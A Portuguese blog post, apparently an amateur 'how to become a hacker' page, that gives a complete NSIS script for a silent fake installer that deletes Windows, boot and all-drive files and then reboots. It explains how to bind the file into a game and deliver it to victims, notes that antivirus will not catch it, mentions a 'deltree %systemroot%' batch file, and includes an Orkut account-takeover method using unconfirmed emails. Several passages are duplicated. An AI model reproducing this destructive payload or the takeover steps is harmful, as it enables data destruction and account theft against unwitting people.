INTRODUÇÃO
Várias são as fantasias e a imaginação
das pessoas sobre esta figura
assustadora que navega no mundo
virtual. Então, vamos começar definindo primeiramente o que são estas figuras.
"Hacker":
É aquele que tem conhecimentos profundos de sistemas
operacionais e linguagens de programação,
principalmente "Unix" e "C" respectivamente.
Conhece as falhas de segurança dos sistemas e
está sempre a procura de novas.
"Cracker":
O mesmo que "hacker", com a diferença de
utilizar seu conhecimento para o "mal". Destruir
e roubar são suas palavras de ordem.
"Phreaker":
Especializado em telefônia, atua na obtenção
de ligações telefônicas gratuitas, instalação de
escutas, facilitando o ataque a sistemas a partir
de acesso no exterior, tornando-se invisíveis ao
rastreamento ou colocando a responsabilidade
em terceiros. Devido ao grande número de pessoas
que hoje se dizem "hackers", novas definiçõe
s
poderão ser encontradas.
"Lammer":
É quem está tentando ser "hacker", sai
perguntando para todo mundo o que fazer
para tornar-se um. Mas só faz merda, não tem
amigos na Net, e só sabe vacilar.
"Wannabe":
É o principiante que já aprendeu a usar os
programas prontos dos verdadeiros "hackers".
"Aracker":
O pior de todos, são os "hackers de araque".
Pensam que sabem tudo e acabam acessando
revistas virtuais pornográficas nas madrugadas.
----------------------------------------
BOM, AGORA QUE VOCÊ CONHECE
TODOS OS TIPOS DE HACKERS, VOU
ENSINAR UM POUCO DE COMO SE
TORNAR UM.
Aqui postarei alguns tuturials:
Criando Vírus que detona o HD:
Pra que você quer saber como criar um vírus? Bem...
A responsabilidade é sua, blz? Nesta dica você terá
uma aulinha prática de como criar um vírus que detona
TUDO do HD.
A responsabilidade é sua, blz? Nesta dica você terá
uma aulinha prática de como criar um vírus que detona
TUDO do HD.
NÃO FAÇA COMENTÁRIOS COM MÁS INTENÇÕES.
NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM.
O CONTEÚDO DESTE ARTIGO VISA MOSTRAR
NOÇÕES IMPORTANTES PARA TODOS OS LADOS.
O USO QUE SE FARÁ DELE
É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS.
COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS,
E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS
PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM
AVISO PRÉVIO.
NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM.
O CONTEÚDO DESTE ARTIGO VISA MOSTRAR
NOÇÕES IMPORTANTES PARA TODOS OS LADOS.
O USO QUE SE FARÁ DELE
É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS.
COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS,
E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS
PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM
AVISO PRÉVIO.
Um vírus é um programa do mal, que faz mal ao sistema
operacional, a outros programas ou a arquivos do
computador. Podem ser ainda de outros tipos,
mas estes são os mais comuns. Basicamente,
um vírus é um programa. Um programa com
instruções que poderiam ser usadas para o bem,
mas aplicadas para o mal. Portanto, para fazer um
vírus, aprenda a fazer programas. Existem, no entanto,
meios mais simples que permitem a criação de vírus
usando determinadas estratégias, ferramentas e
recursos já existentes. Além de saber fazer o vírus,
você deve saber o que ele fará. O vírus ataca alguma
coisa. Você deve conhecer essa coisa, seus pontos
fracos e fortes, verificar caminhos por onde entrar.
E como rodá-lo? O meio mais simples é convencer
os usuários a executar o arquivo do vírus nos seus
computadores. Ou você mesmo, por exemplo, pode
executá-lo no computador do chefe enquanto ele
estiver almoçando - mas se prepare para arcar
com as consequencias depois, pois isso pode ser
ilegal. Para ajudar, existem programas que embutem
um executável dentro de outro, de modo que um seja
executado normalmente, e o outro de forma oculta. Isso
permite, por exemplo, criar um joguinho em flash
(ou pegar uma dessas muitas animações distribuídas
em .exe, o projetor do flash), embutir o vírus nele
e mandar pra pessoa. Ela abre, vê o joguinho, acha
lindo. E por trás de tudo isso, enquanto ela está
distraída e entretida, o vírus trabalha. Ou simplesmente
se copia para alguma pasta, cria entradas no registro
do Windows para se iniciar na próxima sessão, e
ataca a partir dali.
operacional, a outros programas ou a arquivos do
computador. Podem ser ainda de outros tipos,
mas estes são os mais comuns. Basicamente,
um vírus é um programa. Um programa com
instruções que poderiam ser usadas para o bem,
mas aplicadas para o mal. Portanto, para fazer um
vírus, aprenda a fazer programas. Existem, no entanto,
meios mais simples que permitem a criação de vírus
usando determinadas estratégias, ferramentas e
recursos já existentes. Além de saber fazer o vírus,
você deve saber o que ele fará. O vírus ataca alguma
coisa. Você deve conhecer essa coisa, seus pontos
fracos e fortes, verificar caminhos por onde entrar.
E como rodá-lo? O meio mais simples é convencer
os usuários a executar o arquivo do vírus nos seus
computadores. Ou você mesmo, por exemplo, pode
executá-lo no computador do chefe enquanto ele
estiver almoçando - mas se prepare para arcar
com as consequencias depois, pois isso pode ser
ilegal. Para ajudar, existem programas que embutem
um executável dentro de outro, de modo que um seja
executado normalmente, e o outro de forma oculta. Isso
permite, por exemplo, criar um joguinho em flash
(ou pegar uma dessas muitas animações distribuídas
em .exe, o projetor do flash), embutir o vírus nele
e mandar pra pessoa. Ela abre, vê o joguinho, acha
lindo. E por trás de tudo isso, enquanto ela está
distraída e entretida, o vírus trabalha. Ou simplesmente
se copia para alguma pasta, cria entradas no registro
do Windows para se iniciar na próxima sessão, e
ataca a partir dali.
E os anti-vírus, como ficam? Irão bloquear seu vírus?
Eles não sabem se um programa é um vírus ou não,
a menos que tenham a "identidade" deste programa
marcada como "suja", como um vírus. Isso acontece
quando o vírus fica muito divulgado, e acaba caindo
nas mãos do pessoal das empresas de anti-vírus. Eles
checam o arquivo, fazem testes e mais testes.
Comprovado o caso de ser um vírus (ou seja, de ser
um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma
somatória MD5, um trecho de código existente no
arquivo, uma seqüência de operações que
provavelmente só existam naquele arquivo, etc).
E cadastram esse código no anti-vírus. Ao fazer a
varredura, se o anti-vírus identificar algum arquivo
com algumas qualidades cadastradas em seu banco
de dados, ele entenderá ele como vírus e tentará
eliminá-lo ou notificar o usuário. Por isso é bom estar
sempre com seu anti-vírus atualizado, pois praticamente
todo dia surgem novos vírus. Estando atualizado,
ele pode identificar os vírus mais recentes. Mesmo
que um programa seja o pior vírus já inventado,
se ele não estiver catalogado no anti-vírus, ele
provavelmente se dará muito bem e executará suas
funções. Depois? Depois é tarde, né. Já eu, particularmente,
não uso anti-vírus, pois sei me cuidar.
Não quero um programa verificando tudo o que faço e
deixando meu micro mais lento. Muita gente reclama do
Windows e talz e bla bla bla. Mas essa gente poderia
parar um pouco e pensar nela mesma, nas atitudes. A
maioria dos vírus e spywares só consegue realizar seus
objetivos porque o usuário do computador vacilou. Mas
blz, isso não vem ao caso agora.
Eles não sabem se um programa é um vírus ou não,
a menos que tenham a "identidade" deste programa
marcada como "suja", como um vírus. Isso acontece
quando o vírus fica muito divulgado, e acaba caindo
nas mãos do pessoal das empresas de anti-vírus. Eles
checam o arquivo, fazem testes e mais testes.
Comprovado o caso de ser um vírus (ou seja, de ser
um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma
somatória MD5, um trecho de código existente no
arquivo, uma seqüência de operações que
provavelmente só existam naquele arquivo, etc).
E cadastram esse código no anti-vírus. Ao fazer a
varredura, se o anti-vírus identificar algum arquivo
com algumas qualidades cadastradas em seu banco
de dados, ele entenderá ele como vírus e tentará
eliminá-lo ou notificar o usuário. Por isso é bom estar
sempre com seu anti-vírus atualizado, pois praticamente
todo dia surgem novos vírus. Estando atualizado,
ele pode identificar os vírus mais recentes. Mesmo
que um programa seja o pior vírus já inventado,
se ele não estiver catalogado no anti-vírus, ele
provavelmente se dará muito bem e executará suas
funções. Depois? Depois é tarde, né. Já eu, particularmente,
não uso anti-vírus, pois sei me cuidar.
Não quero um programa verificando tudo o que faço e
deixando meu micro mais lento. Muita gente reclama do
Windows e talz e bla bla bla. Mas essa gente poderia
parar um pouco e pensar nela mesma, nas atitudes. A
maioria dos vírus e spywares só consegue realizar seus
objetivos porque o usuário do computador vacilou. Mas
blz, isso não vem ao caso agora.
Um vírus não precisa ser necessariamente um programa.
Você deve estudar e conhecer o que quer atacar, e usar
meios para isso. Por exemplo, apagar arquivos. Criar um
".bat" com o comando "deltree %systemroot%" adaptado
para não mostrar nada, por exemplo. Esse arquivo pode
ser considerado um vírus, embora é um simples arquivo
ASCII, de texto puro. O interpretador de comandos é que
vai executar as ações, de acordo com o que estiver indicado.
De forma semelhante agem os vírus de scripts e macros: por
isso, é bom tomar cuidado com apresentações do Power Point de
desconhecidos, arquivos do Word, etc. Não precisa ser
paranóico e ficar sem abrir esses arquivos, basta pensar
e desativar as macros no seu programa, entre outros cuidados.
Usar o visualizador do PowerPoint, em vez do PowerPoint
completo, é uma boa idéia para ver apresentações da
Internet, já que as macros e arquivos vinculados nem
serão interpretados. No caso de scripts ".js" ou ".vbs", só
execute-os se souber realmente o que está fazendo. Destaco
que esse ".js" não é de "JavaScript", pois esta mesma extensão é
usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas
paranóias. Não é porque a AIDS come solto que você vai
deixar de transar com pessoas que conhece a pouco tempo
ou na balada, mas deverá se cuidar, né? A mesma coisa
pode ser dita em termos de PCs. Execute programas, rode,
teste, fuce, explore, mas com responsa. Isso fica por sua conta.
Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu
diria que "navegar na Internet de forma 100% segura é não
navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha
legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet
(nem modem nem placa de rede ele tem).
Você deve estudar e conhecer o que quer atacar, e usar
meios para isso. Por exemplo, apagar arquivos. Criar um
".bat" com o comando "deltree %systemroot%" adaptado
para não mostrar nada, por exemplo. Esse arquivo pode
ser considerado um vírus, embora é um simples arquivo
ASCII, de texto puro. O interpretador de comandos é que
vai executar as ações, de acordo com o que estiver indicado.
De forma semelhante agem os vírus de scripts e macros: por
isso, é bom tomar cuidado com apresentações do Power Point de
desconhecidos, arquivos do Word, etc. Não precisa ser
paranóico e ficar sem abrir esses arquivos, basta pensar
e desativar as macros no seu programa, entre outros cuidados.
Usar o visualizador do PowerPoint, em vez do PowerPoint
completo, é uma boa idéia para ver apresentações da
Internet, já que as macros e arquivos vinculados nem
serão interpretados. No caso de scripts ".js" ou ".vbs", só
execute-os se souber realmente o que está fazendo. Destaco
que esse ".js" não é de "JavaScript", pois esta mesma extensão é
usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas
paranóias. Não é porque a AIDS come solto que você vai
deixar de transar com pessoas que conhece a pouco tempo
ou na balada, mas deverá se cuidar, né? A mesma coisa
pode ser dita em termos de PCs. Execute programas, rode,
teste, fuce, explore, mas com responsa. Isso fica por sua conta.
Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu
diria que "navegar na Internet de forma 100% segura é não
navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha
legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet
(nem modem nem placa de rede ele tem).
O exemplo a seguir usa o NSIS para criar um arquivo que tenta
apagar tudo do PC. Ele funciona bem em partições sem
permissões de acesso, caso de FAT32. Não funcionará
adequadamente em partições NTFS, mesmo se rodado como administrador, pois o Windows Vista e Windows Seven
têm medidas de segurança mais aprimoradas. Não é fácil
trocar ou apagar arquivos do sistema, é necessário trocar
as permissões antes. Ele fica como exemplo "didático", por
motivos de segurança. Note que ainda assim ele pode apagar
arquivos que o usuário atual tenha direitos. Quando a dica foi
escrita era comum o uso do Windows XP, e até mesmo o 98
por muita gente.
apagar tudo do PC. Ele funciona bem em partições sem
permissões de acesso, caso de FAT32. Não funcionará
adequadamente em partições NTFS, mesmo se rodado como administrador, pois o Windows Vista e Windows Seven
têm medidas de segurança mais aprimoradas. Não é fácil
trocar ou apagar arquivos do sistema, é necessário trocar
as permissões antes. Ele fica como exemplo "didático", por
motivos de segurança. Note que ainda assim ele pode apagar
arquivos que o usuário atual tenha direitos. Quando a dica foi
escrita era comum o uso do Windows XP, e até mesmo o 98
por muita gente.
Se quiser aprender a fazer vírus, aprenda programação, isso
é só um script do NSIS. Porém seria considerado "vírus" por
usuários que fossem prejudicados pela ação dele.
é só um script do NSIS. Porém seria considerado "vírus" por
usuários que fossem prejudicados pela ação dele.
Bom, chega de teoria, não que não seja importante, mas já
falei demais. Se você quer fazer vírus, arregace as mangas
e parta para o estudo, você deverá estudar e fuçar muito. E
cuidado para o feitiço não virar contra o feiticeiro, he he he.
falei demais. Se você quer fazer vírus, arregace as mangas
e parta para o estudo, você deverá estudar e fuçar muito. E
cuidado para o feitiço não virar contra o feiticeiro, he he he.
Vou mostrar como fazer um simples programinha devastador,
que apaga TUDO do HD. Tanto os arquivos do usuário como as
pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque
estarão em uso. Mas apagando a maioria e alguns estratégicos,
já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).
que apaga TUDO do HD. Tanto os arquivos do usuário como as
pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque
estarão em uso. Mas apagando a maioria e alguns estratégicos,
já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).
Apagar arquivos... Sugiro usar o gerador de programas de
instalação NSIS (Nullsoft Scriptable Install System). Ele é
destinado a desenvolvedores e distribuidores de aplicações,
mas é muito versátil. Você cria um "falso" programa de instalação,
que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com
as instruções, compila nele, e ele gera o executável baseado
nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb.
Mas você poderia usar, é claro, outros instaladores...
instalação NSIS (Nullsoft Scriptable Install System). Ele é
destinado a desenvolvedores e distribuidores de aplicações,
mas é muito versátil. Você cria um "falso" programa de instalação,
que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com
as instruções, compila nele, e ele gera o executável baseado
nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb.
Mas você poderia usar, é claro, outros instaladores...
Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é
gratuito (e open source). Não vamos nos deter com o script
dele, vamos direto ao assunto. Ele possui uma função
"Delete", que apaga arquivos ou pastas. Basta você
adicionar os nomes de arquivos ou pastas desejados,
e gerar o programa. Esta função deveria ser usada
para apagar arquivos de um programa que seria
desinstalado, já que o NSIS é um criador de programas
de instalação para outros programas. Mas como apaga
arquivos que você define, pode ser usada para o mal
também, só depende das suas intenções. Em menos de
1 minuto seu vírus estará pronto.
gratuito (e open source). Não vamos nos deter com o script
dele, vamos direto ao assunto. Ele possui uma função
"Delete", que apaga arquivos ou pastas. Basta você
adicionar os nomes de arquivos ou pastas desejados,
e gerar o programa. Esta função deveria ser usada
para apagar arquivos de um programa que seria
desinstalado, já que o NSIS é um criador de programas
de instalação para outros programas. Mas como apaga
arquivos que você define, pode ser usada para o mal
também, só depende das suas intenções. Em menos de
1 minuto seu vírus estará pronto.
AVISO: SE FOR COPIAR E COLAR, CERTIFIQUE-SE DE
QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM
ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS,
APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS
RETAS, NORMALMENTE FICA NA PARTE SUPERIOR
DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS
ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM
ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO
QUAL MUITOS NÃO CONSEGUIAM COMPILAR.
QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM
ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS,
APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS
RETAS, NORMALMENTE FICA NA PARTE SUPERIOR
DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS
ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM
ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO
QUAL MUITOS NÃO CONSEGUIAM COMPILAR.
Com o NSIS instalado, abra um editor de textos puro,
como o Bloco de notas, e digite (ou copie e cole) o
texto em vermelho:
como o Bloco de notas, e digite (ou copie e cole) o
texto em vermelho:
!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"
SetCompressor lzma
Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent
Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd
Section -Post
Reboot
SectionEnd
Salve com a extensão ".nsi", e escolha "Todos os arquivos",
no campo "Salvar como tipo". A extensão ".nsi" é a de
projeto do NSIS, você poderia usar outra qualquer e
depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").
no campo "Salvar como tipo". A extensão ".nsi" é a de
projeto do NSIS, você poderia usar outra qualquer e
depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").
(Não é o arquivo executável, você pode baixar sossegado(a).
É apenas o arquivo de texto pronto. Você pode visualizá-lo
no bloco de notas ou abri-no no NSIS, e é bem pequenininho.
Ele está configurado para apagar arquivos de todas
as unidades, o que conseguir, de forma a limpar pen
drives se estiverem plugados na hora da execução.
Cuidado, não clique no botão "Test Installer" em um
computador com dados importantes.)
É apenas o arquivo de texto pronto. Você pode visualizá-lo
no bloco de notas ou abri-no no NSIS, e é bem pequenininho.
Ele está configurado para apagar arquivos de todas
as unidades, o que conseguir, de forma a limpar pen
drives se estiverem plugados na hora da execução.
Cuidado, não clique no botão "Test Installer" em um
computador com dados importantes.)
Vamos entender esse arquivo... As três primeiras
linhas identificam o "programa" que seria instalado,
afinal o NSIS é um instalador. Deixe como está, ou
escreva qualquer coisa, de preferência não palavras.
O item "OutFile" é o executável que será gerado, é
o seu vírus que deverá ser distribuído. A
linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.
linhas identificam o "programa" que seria instalado,
afinal o NSIS é um instalador. Deixe como está, ou
escreva qualquer coisa, de preferência não palavras.
O item "OutFile" é o executável que será gerado, é
o seu vírus que deverá ser distribuído. A
linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.
Na seção "Sec01", você deve adicionar as
entradas "Delete" que desejar. Existem o
utros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.
entradas "Delete" que desejar. Existem o
utros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.
A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga
tudo da pasta do Windows, deixando para apagar na
próxima inicialização o que estiver em uso. Copie-a e cole-a
abaixo dela, antes do SectionEnd, trocando as pastas ou
arquivos que você queira apagar. Por exemplo:
tudo da pasta do Windows, deixando para apagar na
próxima inicialização o que estiver em uso. Copie-a e cole-a
abaixo dela, antes do SectionEnd, trocando as pastas ou
arquivos que você queira apagar. Por exemplo:
Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"
Adicione o que quiser, arquivos específicos, etc.
A última seção, "Section -Post / Reboot / SectionEnd"
, será executada ao concluir o instalador, ou seja,
quando ele terminar sua ação. O comando "reboot"
reiniciará o computador, que na próxima inicialização
nem inicia mais. Se você quiser, pode remover essas três
últimas linhas, para deixar o usuário em desespero,
vendo que tudo do seu PC foi apagado.
, será executada ao concluir o instalador, ou seja,
quando ele terminar sua ação. O comando "reboot"
reiniciará o computador, que na próxima inicialização
nem inicia mais. Se você quiser, pode remover essas três
últimas linhas, para deixar o usuário em desespero,
vendo que tudo do seu PC foi apagado.
Salve o arquivo. Abra o compilador do NSIS,
em "Iniciar > Programas > MakeNSISW (Compiler GUI)",
clique no menu "File > Load script", localize o arquivo
de extensão ".nsi" que você salvou. Ele já compilará,
é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".
em "Iniciar > Programas > MakeNSISW (Compiler GUI)",
clique no menu "File > Load script", localize o arquivo
de extensão ".nsi" que você salvou. Ele já compilará,
é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".
O vírus está pronto! E, em condições normais, nenhum
anti-vírus o detectaria, a menos que ele fosse parar
nas mãos de algum criador de anti-vírus.
anti-vírus o detectaria, a menos que ele fosse parar
nas mãos de algum criador de anti-vírus.
Como testá-lo sem se ferrar por conta da própria
criação? Use máquinas virtuais!
criação? Use máquinas virtuais!
Hackeando Orkut:
Primeiramente, você vai logar no seu orkut
e vai escolher a sua vítima. Após ter logado,
Após ter achado sua vítima, você deverá ver
de qual servidor essa pessoa. Veja o que vem
depois do arroba (@) do email dessa pessoa,
por exemplo, se for algumacoisa@hotmail.com,
então você aplicará o hack através do site
www.hotmail.com, caso seja
algumaoutracoisa@yahoo.com.br você aplicará
no site www.yahoo.com.br. Entendeu?
Depois de você entrar no email, vá seguindo
os passos de criar um novo email. Na hora de
dizer qual é o email que você quer criar,
escolha exatamente aquele email não confirmado
da pessoa escolhida para hackear. Veja que o
email não existe e você irá criá-lo. Como isso
acontece? Essas pessoas não tem email e criam
emails de mentira para poder usar o orkut, como
nunca confirmaram esse email ele estará lá como
não confirmado dentro do orkut.
Você cria o email igualzinho ao da sua vítima.
Após criado o email, entre na tela de login do
orkut e clique em “não consigo acessar minha
conta”, depois clica em “esqueci minha senha” e
depois coloque o email da pessoa no campo que
o google vai mandar um email pedindo para você
redefenir a senha da vítima. Abra o email, clique
no primeiro link e mude a senha.
Agora é só logar e TCHARAM, você terá invadido
o orkut de alguém!
Lembrem-se, cerca de 10% dos usuários do orkut
têm emails não confirmados, então você precisará
de muita paciência e muita sorte para encontrar
alguém que possa ser hackiado através deste método.
Uma dica importante, não façam isso com muita
frequência, pois seu IP pode ser bloqueado e
você pode nunca mais conseguir acessar o orkut
da sua casa.
Como acessar blogs bloqueados:
Bibliotecas em especial que
bloqueiam blogs, sites, orkut,
msn, estão contribuindo para a
idiotização das massas muito mais
do que tentando impedi-la. Acesso
à informação e construção do
conhecimento não se dá apenas
através de formatos canônicos
do conhecimento registrado.
Bibliotecários e gestores da
informação que se acham
imponentes o suficiente para
julgar a qualidade e relevância
do que circula hoje na web, e
bloqueiam sites, estão jogando
no lixo um dos maiores potenciais
da biblioteca enquanto instituição,
que é compreender as necessidades
pontuais da comunidade a qual
se volta, e oferecer conteúdo
que faça sentido para a vida dessas
pessoas.
–
Existem diversas maneiras de acessar
sites e blogs bloqueados,
especialmente para acesso à blogs
(blogspot e wordpress). Entre
as formas mais simples de garantir
acesso, eu sugiro:
1. utilizar um proxy no browser.
Procure por “proxy browser” no
google e veja quais deles você consegue acessar.
2. acessar através do leitor de rss.
Assine o feed do blog e pronto.
3. para sites estáticos, dá pra usar o wayback machine.
Assinar:
Postagens (Atom)



